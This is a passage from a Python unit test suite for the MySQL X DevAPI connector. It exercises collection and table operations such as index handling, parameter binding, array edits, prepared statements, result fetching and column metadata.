# "required" fields must be Boolean
index_name = "age_idx"
index_desc = {"fields": [{"field": "$.age", "type": "INT",
"required": "True"}], "unique": False}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(TypeError, create_index.execute)
# "array" fields must be Boolean
index_name = "emails_idx"
index_desc = {"fields": [{"field": "$.emails", "type": "CHAR(128)",
"array": "True"}]}
create_index = collection.create_index(index_name, index_desc)
self.assertRaises(TypeError, create_index.execute)
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 4), "Dev API change")
def test_drop_index(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
index_name = "age_idx"
collection.create_index(index_name,
{"fields": [{"field": "$.age", "type": "INT",
"required": True}],
"unique": False}).execute()
show_indexes_sql = (
"SHOW INDEXES FROM `{0}`.`{1}` WHERE Key_name='{2}'"
"".format(self.schema_name, collection_name, index_name)
)
result = self.session.sql(show_indexes_sql).execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
collection.drop_index(index_name)
result = self.session.sql(show_indexes_sql).execute()
rows = result.fetch_all()
self.assertEqual(0, len(rows))
# dropping an non-existing index should succeed silently
collection.drop_index(index_name)
self.schema.drop_collection(collection_name)
def test_parameter_binding(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
result = collection.find("age == :age").bind("age", 67).execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual("Betty", docs[0]["name"])
result = collection.find("$.age = :age").bind('{"age": 42}') \
.sort("age DESC, name ASC").execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual("Wilma", docs[0]["name"])
# The number of bind parameters and placeholders do not match
self.assertRaises(mysqlx.ProgrammingError,
collection.find("$.age = ? and $.name = ?").bind, 42)
# Binding anonymous parameters are not allowed in crud operations
self.assertRaises(mysqlx.ProgrammingError,
collection.find("$.age = ?").bind, 42)
self.assertRaises(mysqlx.ProgrammingError,
collection.find("$.name = ?").bind, "Fred")
self.schema.drop_collection(collection_name)
def test_unicode_parameter_binding(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": u"José", "age": 21},
{"_id": "2", "name": u"João", "age": 28},
{"_id": "3", "name": u"Célia", "age": 42},
).execute()
result = collection.find("name == :name").bind("name", u"José") \
.execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual(u"José", docs[0]["name"])
result = collection.find("$.name = :name").bind(u'{"name": "João"}') \
.execute()
docs = result.fetch_all()
self.assertEqual(1, len(docs))
self.assertEqual(u"João", docs[0]["name"])
self.schema.drop_collection(collection_name)
def test_array_insert(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": 1, "name": "Fred", "cards": []},
{"_id": 2, "name": "Barney", "cards": [1, 2, 4]},
{"_id": 3, "name": "Wilma", "cards": []},
{"_id": 4, "name": "Betty", "cards": []},
).execute()
collection.modify("$._id == 2").array_insert("$.cards[2]", 3).execute()
docs = collection.find("$._id == 2").execute().fetch_all()
self.assertEqual([1, 2, 3, 4], docs[0]["cards"])
# Test binding
modify = collection.modify("$._id == :id").array_insert("$.cards[0]", 0)
modify.bind("id", 1).execute()
doc = collection.get_one(1)
self.assertEqual([0], doc["cards"])
modify.bind("id", 2).execute()
doc = collection.get_one(2)
self.assertEqual([0, 1, 2, 3, 4], doc["cards"])
modify.bind("id", 3).execute()
doc = collection.get_one(3)
self.assertEqual([0], doc["cards"])
self.schema.drop_collection(collection_name)
def test_array_append(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": 1, "name": "Fred", "cards": [1]},
{"_id": 2, "name": "Barney", "cards": [1, 2, 4]},
{"_id": 3, "name": "Wilma", "cards": [1, 2]},
{"_id": 4, "name": "Betty", "cards": []},
).execute()
collection.modify("$._id == 2").array_append("$.cards[1]", 3).execute()
docs = collection.find("$._id == 2").execute().fetch_all()
self.assertEqual([1, [2, 3], 4], docs[0]["cards"])
# Test binding
modify = collection.modify("$._id == :id").array_append("$.cards[0]", 5)
modify.bind("id", 1).execute()
doc = collection.get_one(1)
self.assertEqual([[1, 5]], doc["cards"])
modify.bind("id", 2).execute()
doc = collection.get_one(2)
self.assertEqual([[1, 5], [2, 3], 4], doc["cards"])
modify.bind("id", 3).execute()
doc = collection.get_one(3)
self.assertEqual([[1, 5], 2], doc["cards"])
self.schema.drop_collection(collection_name)
def test_count(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
self.assertEqual(4, collection.count())
self.schema.drop_collection(collection_name)
self.assertRaises(mysqlx.OperationalError, collection.count)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 14),
"Prepared statements not supported")
def test_prepared_statements(self):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
expected_stmt_attrs = \
lambda stmt, changed, prepared, repeated, exec_counter: \
stmt.changed == changed and stmt.prepared == prepared and \
stmt.repeated == repeated and stmt.exec_counter == exec_counter
collection_name = "prepared_collection_test"
collection = schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
{"_id": "5", "name": "Bob", "age": 75},
).execute()
# FindStatement
find = collection.find("$.age == :age")
self.assertTrue(expected_stmt_attrs(find, True, False, False, 0))
# On the first call should: Crud::Find (without prepared statement)
find.bind("age", 21).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
find.bind("age", 28).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, True, True, 2))
# On subsequent calls should: Prepare::Execute
find.bind("age", 42).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, True, True, 3))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
expected_sql_text = ("SELECT doc FROM `{}`.`{}` "
"WHERE (JSON_EXTRACT(doc,'$.age') = ?)"
"".format(self.schema_name, collection_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], find.exec_counter - 1)
# Using sort() should deallocate the prepared statement:
# Prepare::Deallocate + Crud::Find
find.bind("age", 21).sort("age").execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
find.bind("age", 42).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, True, True, 2))
# The previous statement should be closed since it had no limit/offset
# Prepare::Deallocate + Prepare::Prepare + Prepare::Execute
find.bind("age", 67).limit(1).offset(0).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, True, False, 1))
# On the second call should: Prepare::Execute
find.bind("age", 75).limit(1).offset(0).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(find, False, True, True, 2))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
expected_sql_text = ("SELECT doc FROM `{}`.`{}` "
"WHERE (JSON_EXTRACT(doc,'$.age') = ?) "
"ORDER BY JSON_EXTRACT(doc,'$.age') LIMIT ?, ?"
"".format(self.schema_name, collection_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], find.exec_counter)
# ModifyStatement
modify = collection.modify("$._id == :id").set("age", 18)
self.assertTrue(expected_stmt_attrs(modify, True, False, False, 0))
# On the first call should: Crud::Modify (without prepared statement)
res = modify.bind("id", "1").execute()
self.assertTrue(expected_stmt_attrs(modify, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
res = modify.bind("id", "2").execute()
self.assertTrue(expected_stmt_attrs(modify, False, True, True, 2))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
expected_sql_text = ("UPDATE `{}`.`{}` "
"SET doc=JSON_SET(JSON_SET(doc,'$.age',18),"
"'$._id',JSON_EXTRACT(`doc`,'$._id')) "
"WHERE (JSON_EXTRACT(doc,'$._id') = ?)"
"".format(self.schema_name, collection_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], modify.exec_counter - 1)
# Using set() should deallocate the prepared statement:
# Prepare::Deallocate + Crud::Modify
res = modify.bind("id", "3").set("age", 92).execute()
self.assertTrue(expected_stmt_attrs(modify, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
res = modify.bind("id", "4").execute()
self.assertTrue(expected_stmt_attrs(modify, False, True, True, 2))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
expected_sql_text = ("UPDATE `{}`.`{}` "
"SET doc=JSON_SET(JSON_SET(doc,'$.age',92),'$._id'"
",JSON_EXTRACT(`doc`,'$._id')) "
"WHERE (JSON_EXTRACT(doc,'$._id') = ?)"
"".format(self.schema_name, collection_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], modify.exec_counter - 1)
# RemoveStatement
remove = collection.remove("$._id == :id").limit(2)
self.assertTrue(expected_stmt_attrs(remove, True, False, False, 0))
# On the first call should: Crud::Remove (without prepared statement)
remove.bind("id", "1").execute()
self.assertTrue(expected_stmt_attrs(remove, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
remove.bind("id", "2").execute()
self.assertTrue(expected_stmt_attrs(remove, False, True, True, 2))
# On subsequent calls should: Prepare::Execute
remove.bind("id", "3").execute()
self.assertTrue(expected_stmt_attrs(remove, False, True, True, 3))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
expected_sql_text = ("DELETE FROM `{}`.`{}` "
"WHERE (JSON_EXTRACT(doc,'$._id') = ?) LIMIT ?"
"".format(self.schema_name, collection_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], remove.exec_counter - 1)
# Using sort() should deallocate the prepared statement:
# Prepare::Deallocate + Crud::Remove
remove.bind("id", "3").sort("_id ASC").execute()
self.assertTrue(expected_stmt_attrs(remove, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
remove.bind("id", "4").execute()
self.assertTrue(expected_stmt_attrs(remove, False, True, True, 2))
# On subsequent calls should: Prepare::Execute
remove.bind("id", "5").execute()
self.assertTrue(expected_stmt_attrs(remove, False, True, True, 3))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
expected_sql_text = ("DELETE FROM `{}`.`{}` "
"WHERE (JSON_EXTRACT(doc,'$._id') = ?) "
"ORDER BY JSON_EXTRACT(doc,'$._id') LIMIT ?"
"".format(self.schema_name, collection_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], remove.exec_counter - 1)
schema.drop_collection(collection_name)
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxTableTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
self.session.close()
def test_exists_in_database(self):
table_name = "table_test"
try:
sql = _CREATE_TEST_TABLE_QUERY.format(self.schema_name, table_name)
self.session.sql(sql).execute()
except mysqlx.Error as err:
LOGGER.info("{0}".format(err))
table = self.schema.get_table(table_name)
self.assertTrue(table.exists_in_database())
drop_table(self.schema, table_name)
def test_select(self):
table_name = "{0}.test".format(self.schema_name)
self.session.sql("CREATE TABLE {0}(age INT, name VARCHAR(50))"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (67, 'Betty')"
"".format(table_name)).execute()
table = self.schema.get_table("test")
result = table.select().order_by("age DESC").execute()
rows = result.fetch_all()
self.assertEqual(4, len(rows))
self.assertEqual(67, rows[0]["age"])
result = table.select("age").where("age = 42").execute()
self.assertEqual(1, len(result.columns))
rows = result.fetch_all()
self.assertEqual(1, len(rows))
# test flexible params
result = table.select(['age', 'name']).order_by("age DESC").execute()
rows = result.fetch_all()
self.assertEqual(4, len(rows))
# test like operator
result = table.select().where("name like 'B%'").execute()
rows = result.fetch_all()
self.assertEqual(2, len(rows))
# test aggregation functions
result = table.select("sum(age)").execute()
rows = result.fetch_all()
self.assertTrue("sum(age)" == result.columns[0].get_column_name())
self.assertEqual(158, rows[0]["sum(age)"])
# test operators without alias
result = table.select("age + 100").execute()
rows = result.fetch_all()
self.assertTrue("age + 100" == result.columns[0].get_column_name())
# test cast operators
result = table.select("cast(age as binary(10)) as test").execute()
self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.BYTES)
result = table.select("cast('1994-12-11' as date) as test").execute()
self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.DATE)
result = table.select("cast('1994-12-11:12:00:00' as datetime) as "
"test").execute()
self.assertEqual(result.columns[0].get_type(),
mysqlx.ColumnType.DATETIME)
result = table.select("cast(age as decimal(10, 7)) as test").execute()
self.assertEqual(result.columns[0].get_type(),
mysqlx.ColumnType.DECIMAL)
result = table.select("cast('{\"a\": 24}' as json) as test").execute()
self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.JSON)
result = table.select("cast(age as signed) as test").execute()
self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.INT)
result = table.select("cast(age as unsigned) as test").execute()
self.assertEqual(result.columns[0].get_type(),
mysqlx.ColumnType.BIGINT)
result = table.select("cast(age as signed integer) as test").execute()
self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.INT)
result = table.select("cast(age as unsigned integer) as "
"test").execute()
self.assertEqual(result.columns[0].get_type(),
mysqlx.ColumnType.BIGINT)
result = table.select("cast('12:00:00' as time) as test").execute()
self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.TIME)
drop_table(self.schema, "test")
coll = self.schema.create_collection("test")
coll.add(
{"_id": "1", "a": 21},
{"_id": "2", "a": 22},
{"_id": "3", "a": 23},
{"_id": "4", "a": 24}
).execute()
table = self.schema.get_collection_as_table("test")
result = table.select("doc->'$.a' as a").execute()
rows = result.fetch_all()
self.assertEqual("a", result.columns[0].get_column_name())
self.assertEqual(4, len(rows))
self.schema.drop_collection("test")
def test_having(self):
table_name = "{0}.test".format(self.schema_name)
self.session.sql("CREATE TABLE {0}(age INT, name VARCHAR(50), "
"gender CHAR(1))".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (21, 'Fred', 'M')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (28, 'Barney', 'M')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma', 'F')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (67, 'Betty', 'F')"
"".format(table_name)).execute()
table = self.schema.get_table("test")
result = table.select().group_by("gender").order_by("age ASC").execute()
rows = result.fetch_all()
self.assertEqual(2, len(rows))
self.assertEqual(21, rows[0]["age"])
self.assertEqual(42, rows[1]["age"])
result = table.select().group_by("gender").having("gender = 'F'") \
.order_by("age ASC").execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
self.assertEqual(42, rows[0]["age"])
# test flexible params
result = table.select().group_by(["gender"]) \
.order_by(["name DESC", "age ASC"]).execute()
rows = result.fetch_all()
self.assertEqual(2, len(rows))
self.assertEqual(42, rows[0]["age"])
self.assertEqual(21, rows[1]["age"])
drop_table(self.schema, "test")
def test_insert(self):
self.session.sql("CREATE TABLE {0}.test(age INT, name "
"VARCHAR(50), gender CHAR(1))"
"".format(self.schema_name)).execute()
table = self.schema.get_table("test")
result = table.insert("age", "name") \
.values(21, 'Fred') \
.values(28, 'Barney') \
.values(42, 'Wilma') \
.values(67, 'Betty').execute()
result = table.select().execute()
rows = result.fetch_all()
self.assertEqual(4, len(rows))
# test flexible params
result = table.insert(["age", "name"]) \
.values([35, 'Eddard']) \
.values(9, 'Arya').execute()
result = table.select().execute()
rows = result.fetch_all()
self.assertEqual(6, len(rows))
# test unicode
table.insert("age", "name").values(1, u"😀").execute()
result = table.select().execute()
rows = result.fetch_all()
self.assertEqual(7, len(rows))
drop_table(self.schema, "test")
def test_update(self):
self.session.sql("CREATE TABLE {0}.test(age INT, name "
"VARCHAR(50), gender CHAR(1), `info` json DEFAULT NULL)"
"".format(self.schema_name)).execute()
table = self.schema.get_table("test")
result = table.insert("age", "name", "info") \
.values(21, 'Fred', {"married": True, "sons": 0}) \
.values(28, 'Barney', {"married": True, "sons": 1}) \
.values(42, 'Wilma', {"married": True, "sons": 0}) \
.values(67, 'Betty', {"married": True, "sons": 1}).execute()
result = table.update().set("age", 25).where("age == 21").execute()
self.assertEqual(1, result.get_affected_items_count())
# Table.update() is not allowed without a condition
result = table.update().set("age", 25)
self.assertRaises(mysqlx.ProgrammingError, result.execute)
# Update with a mysqlx expression
statement = table.update()
statement.set("info", mysqlx.expr("JSON_SET(info, '$.sons', $.sons * 2)"))
result = statement.where( "name = 'Barney' or name = 'Betty'").execute()
assert (2 == result.get_affected_items_count())
statement = table.update()
statement.set("info", mysqlx.expr("JSON_REPLACE(info, '$.married', False)"))
result = statement.where( "name = 'Fred' or name = 'Wilma'").execute()
assert (2 == result.get_affected_items_count())
drop_table(self.schema, "test")
def test_delete(self):
table_name = "table_test"
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, table_name)).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, table_name, "1")).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, table_name, "2")).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, table_name, "3")).execute()
table = self.schema.get_table(table_name)
self.assertTrue(table.exists_in_database())
self.assertEqual(table.count(), 3)
table.delete().where("id = 1").execute()
self.assertEqual(table.count(), 2)
# Table.delete() is not allowed without a condition
result = table.delete()
self.assertRaises(mysqlx.ProgrammingError, result.execute)
drop_table(self.schema, table_name)
def test_count(self):
table_name = "table_test"
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, table_name)).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, table_name, "1")).execute()
table = self.schema.get_table(table_name)
self.assertTrue(table.exists_in_database())
self.assertEqual(table.count(), 1)
drop_table(self.schema, table_name)
self.assertRaises(mysqlx.OperationalError, table.count)
def test_results(self):
table_name = "{0}.test".format(self.schema_name)
self.session.sql("CREATE TABLE {0}(age INT, name VARCHAR(50))"
"".format(table_name)).execute()
# Test if result has no data
result = self.session.sql("SELECT age, name FROM {0}"
"".format(table_name)).execute()
self.assertFalse(result.has_data())
rows = result.fetch_all()
self.assertEqual(len(rows), 0)
# Insert data
self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
"".format(table_name)).execute()
self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
"".format(table_name)).execute()
# Test if result has data
result = self.session.sql("SELECT age, name FROM {0}"
"".format(table_name)).execute()
self.assertTrue(result.has_data())
rows = result.fetch_all()
self.assertEqual(len(rows), 2)
table = self.schema.get_table("test")
result = table.select().execute()
row = result.fetch_one()
# Test access by column name and index
self.assertEqual("Fred", row["name"])
self.assertEqual("Fred", row[1])
# Test if error is raised with negative indexes and out of bounds
self.assertRaises(IndexError, row.__getitem__, -1)
self.assertRaises(IndexError, row.__getitem__, -2)
self.assertRaises(IndexError, row.__getitem__, -3)
self.assertRaises(IndexError, row.__getitem__, 3)
# Test if error is raised with an invalid column name
self.assertRaises(ValueError, row.__getitem__, "last_name")
row = result.fetch_one()
self.assertEqual("Barney", row["name"])
self.assertEqual("Barney", row[1])
self.assertEqual(None, result.fetch_one())
# Test result using column label
table = self.schema.get_table("test")
result = table.select("age AS the_age, name AS the_name") \
.where("age = 21").execute()
row = result.fetch_one()
self.assertEqual(21, row["the_age"])
self.assertEqual("Fred", row["the_name"])
drop_table(self.schema, "test")
def test_multiple_resultsets(self):
self.session.sql("CREATE PROCEDURE {0}.spProc() BEGIN SELECT 1; "
"SELECT 2; SELECT 'a'; END"
"".format(self.schema_name)).execute()
result = self.session.sql(" CALL {0}.spProc"
"".format(self.schema_name)).execute()
rows = result.fetch_all()
self.assertEqual(1, len(rows))
self.assertEqual(1, rows[0][0])
self.assertEqual(True, result.next_result())
rows = result.fetch_all()
self.assertEqual(1, len(rows))
self.assertEqual(2, rows[0][0])
self.assertEqual(True, result.next_result())
rows = result.fetch_all()
self.assertEqual(1, len(rows))
self.assertEqual("a", rows[0][0])
self.assertEqual(False, result.next_result())
self.session.sql("DROP PROCEDURE IF EXISTS {0}.spProc"
"".format(self.schema_name)).execute()
def test_auto_inc_value(self):
table_name = "{0}.test".format(self.schema_name)
self.session.sql(
"CREATE TABLE {0}(id INT KEY AUTO_INCREMENT, name VARCHAR(50))"
"".format(table_name)).execute()
result = self.session.sql("INSERT INTO {0} VALUES (NULL, 'Fred')"
"".format(table_name)).execute()
self.assertEqual(1, result.get_autoincrement_value())
table = self.schema.get_table("test")
result2 = table.insert("id", "name").values(None, "Boo").execute()
self.assertEqual(2, result2.get_autoincrement_value())
drop_table(self.schema, "test")
def test_column_metadata(self):
table_name = "{0}.test".format(self.schema_name)
self.session.sql(
"CREATE TABLE {0}(age INT, name VARCHAR(50), pic VARBINARY(100), "
"config JSON, created DATE, updated DATETIME(6), ts TIMESTAMP(2), "
"active BIT)".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (21, 'Fred', NULL, NULL, '2008-07-26', "
"'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 0)"
"".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (28, 'Barney', NULL, NULL, '2012-03-12', "
"'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 0)"
"".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (42, 'Wilma', NULL, NULL, '1975-11-11', "
"'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 1)"
"".format(table_name)).execute()
self.session.sql(
"INSERT INTO {0} VALUES (67, 'Betty', NULL, NULL, '2015-06-21', "
"'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 0)"
"".format(table_name)).execute()
table = self.schema.get_table("test")
result = table.select().execute()
result.fetch_all()
col = result.columns[0]
self.assertEqual("age", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.INT, col.get_type())
col = result.columns[1]
self.assertEqual("name", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.STRING, col.get_type())
if tests.MYSQL_VERSION >= (8, 0, 1):
self.assertEqual("utf8mb4_0900_ai_ci", col.get_collation_name())
self.assertEqual("utf8mb4", col.get_character_set_name())
col = result.columns[2]
self.assertEqual("pic", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual("binary", col.get_collation_name())
self.assertEqual("binary", col.get_character_set_name())
self.assertEqual(mysqlx.ColumnType.BYTES, col.get_type())
col = result.columns[3]
self.assertEqual("config", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.JSON, col.get_type())
col = result.columns[4]
self.assertEqual("created", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.DATE, col.get_type())
col = result.columns[5]
self.assertEqual("updated", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.DATETIME, col.get_type())
col = result.columns[6]
self.assertEqual("ts", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.TIMESTAMP, col.get_type())
col = result.columns[7]
self.assertEqual("active", col.get_column_name())
self.assertEqual("test", col.get_table_name())
self.assertEqual(mysqlx.ColumnType.BIT, col.get_type())
self.assertEqual(result.columns, result.get_columns())
drop_table(self.schema, "test")
def test_is_view(self):
table_name = "table_test"
view_name = "view_test"
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, table_name)).execute()
self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
self.schema_name, table_name, "1")).execute()
table = self.schema.get_table(table_name)
self.assertFalse(table.is_view())
self.session.sql(_CREATE_TEST_VIEW_QUERY.format(
self.schema_name, view_name,
self.schema_name, table_name)).execute()
view = self.schema.get_table(view_name)
self.assertTrue(view.is_view())
drop_table(self.schema, table_name)
drop_view(self.schema, view_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 14),
"Prepared statements not supported")
def test_prepared_statements(self):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
expected_stmt_attrs = \
lambda stmt, changed, prepared, repeated, exec_counter: \
stmt.changed == changed and stmt.prepared == prepared and \
stmt.repeated == repeated and stmt.exec_counter == exec_counter
table_name = "prepared_table_test"
session.sql("CREATE TABLE {}.{}(id INT KEY AUTO_INCREMENT, "
"name VARCHAR(50), age INT)"
"".format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
table.insert("name", "age") \
.values("Fred", 21) \
.values("Barney", 28) \
.values("Wilma", 42) \
.values("Betty", 67) \
.values("Bob", 75).execute()
# SelectStatement
select = table.select().where("age == :age")
self.assertTrue(expected_stmt_attrs(select, True, False, False, 0))
# On the first call should: Crud::Select (without prepared statement)
select.bind("age", 21).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
select.bind("age", 28).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, True, True, 2))
# On subsequent calls should: Prepare::Execute
select.bind("age", 42).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, True, True, 3))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
expected_sql_text = ("SELECT * FROM `{}`.`{}` "
"WHERE (`age` = ?)"
"".format(self.schema_name, table_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], select.exec_counter - 1)
# Using sort() should deallocate the prepared statement:
# Prepare::Deallocate + Crud::Select
select.bind("age", 21).order_by("age").execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
select.bind("age", 42).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, True, True, 2))
# The previous statement should be closed since it had no limit/offset
# Prepare::Deallocate + Crud::Find
select.bind("age", 67).limit(1).offset(0).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, True, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
select.bind("age", 75).limit(1).offset(0).execute().fetch_all()
self.assertTrue(expected_stmt_attrs(select, False, True, True, 2))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
expected_sql_text = ("SELECT * FROM `{}`.`{}` "
"WHERE (`age` = ?) ORDER BY `age` LIMIT ?, ?"
"".format(self.schema_name, table_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], select.exec_counter)
# UpdateStatement
update = table.update().where("id == :id").set("age", 18)
self.assertTrue(expected_stmt_attrs(update, True, False, False, 0))
# On the first call should: Crud::Update (without prepared statement)
update.bind("id", 1).execute()
self.assertTrue(expected_stmt_attrs(update, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
update.bind("id", 2).execute()
self.assertTrue(expected_stmt_attrs(update, False, True, True, 2))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
expected_sql_text = ("UPDATE `{}`.`{}` SET `age`=18 "
"WHERE (`id` = ?)"
"".format(self.schema_name, table_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], update.exec_counter - 1)
# Using set() should deallocate the prepared statement:
# Prepare::Deallocate + Crud::Update
update.bind("id", "3").set("age", 92).execute()
self.assertTrue(expected_stmt_attrs(update, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
update.bind("id", "4").execute()
self.assertTrue(expected_stmt_attrs(update, False, True, True, 2))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
expected_sql_text = ("UPDATE `{}`.`{}` "
"SET `age`=92 WHERE (`id` = ?)"
"".format(self.schema_name, table_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], update.exec_counter - 1)
# DeleteStatement
delete = table.delete().where("id == :id")
self.assertTrue(expected_stmt_attrs(delete, True, False, False, 0))
# On the first call should: Crud::Delete (without prepared statement)
delete.bind("id", 1).execute()
self.assertTrue(expected_stmt_attrs(delete, False, False, False, 1))
# On the second call should: Prepare::Prepare + Prepare::Execute
delete.bind("id", 2).execute()
self.assertTrue(expected_stmt_attrs(delete, False, True, True, 2))
# On subsequent calls should: Prepare::Execute
delete.bind("id", 3).execute()
self.assertTrue(expected_stmt_attrs(delete, False, True, True, 3))
row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
expected_sql_text = ("DELETE FROM `{}`.`{}` "
"WHERE (`id` = ?)"
"".format(self.schema_name, table_name))
self.assertEqual(row[0], expected_sql_text)
self.assertEqual(row[1], delete.exec_counter - 1)
